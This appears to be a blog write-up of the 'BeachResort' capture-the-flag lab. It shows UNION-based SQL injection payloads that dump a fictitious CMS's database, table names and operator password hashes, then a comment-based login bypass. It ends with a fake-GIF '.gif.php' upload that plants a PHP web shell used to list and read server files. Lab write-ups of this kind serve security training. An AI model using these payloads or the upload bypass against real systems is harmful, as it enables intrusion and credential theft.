[HACKME] BeachResort

Another CTF by decoder-ap. To complete the CTF I need to answer to these questions:
1) What is the CMS administrator’s username?
2) What is the db name?
3) List the table names.
4) List all the files stored in the root directory of superCMS admin site.
5) What is the license key?
6) List the contents of a very super secret file.

ANALYZING THE TARGET

When I opened my sandbox I saw a static HTML website of the BeachResort. It was made with SuperCMS (it is a fictitious name) which is in beta version so it can be vulnerable to something. Looking at the SuperCMS banner URL at the bottom of the page I discovered an hidden folder: cmsadm but browsing into it I got error 403. So there is not an index page into the admin panel and I need to guess it.

EXPLOITATION

After some reasearch I discovered the login panel: cmsadm/login.php. There was a login form with an username and a password. I tested it to an SQL Injection with SQL Map and it is exploitable but I will perform it manually. First of all I tried to append an apix to the username parameter but nothing happened, then I tried an UNION based SQLi:

user' UNION ALL SELECT 1-- -

And it worked! Notice that I have only one column where to inject the code. Then I found the database name:

user' UNION ALL SELECT database()-- -

This is the output:

supercms 

Now I discovered the tables names:

user' UNION ALL SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1-- -

I increased LIMIT from 0 to 2 by 1 and I retrieved the only three tables of database supercms:

groups
license
operators

Then I retrieved columns names of operators table:

user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='operators' LIMIT 0,1-- -
user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='operators' LIMIT 1,1-- -
user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='operators' LIMIT 2,1-- -
user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='operators' LIMIT 3,1-- -
user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='operators' LIMIT 4,1-- -

And I got:

id
username
password
firstname
lastname

Now I dumped data from operators table:

user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 0, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 1, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 2, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 3, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 4, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 5, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 6, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 7, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 8, 1-- -

This is the output:

andrew 5f4dcc3b5aa765d61d8327deb882cf99
beatrice 5f4dcc3b5aa765d61d8327deb882cf99
arnold 5f4dcc3b5aa765d61d8327deb882cf99
barbara 5f4dcc3b5aa765d61d8327deb882cf99
eva 5f4dcc3b5aa765d61d8327deb882cf99
test1 5f4dcc3b5aa765d61d8327deb882cf99
test2 5f4dcc3b5aa765d61d8327deb882cf99
test3 5f4dcc3b5aa765d61d8327deb882cf99
cmsadmin 2bfea2ff114ccd30d95e176a1d25346a

Now I retrieved the license key:

user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='license' LIMIT 0,1-- -
user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='license' LIMIT 1,1-- -

The output:

id
license_key

Then:

user' UNION ALL SELECT license_key FROM license LIMIT 0, 1-- -

And I got the license key. Then I logged in as cmsadmin:

cmsadmin'-- -

Now I clicked on “Upload Image File” link, I setup Burpsuite as proxy and I uploaded a .gif file, I edited the content of the fake image:

GIF89a

Then I edited the extension to .gif.php and I forwarded the request. Now I uploaded it succesfully and I browsed to /images/shell.gif.php. Now I can execute arbitrary PHP code. First of all I listed the content of cmsadm folder:

/images/shell.gif.php?cmd=print_r(scandir('../cmsadm'));

And I got this:

add_page.php
css
images
include
js
login.php
menu.php
scripts
secret.noop
update_page.php
upload.php

Then I red the secret file:

/images/shell.gif.php?cmd=echo readfile('../cmsadm/secret.noop');

CTF completed!

Advertisements
[HACKME] BeachResort

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s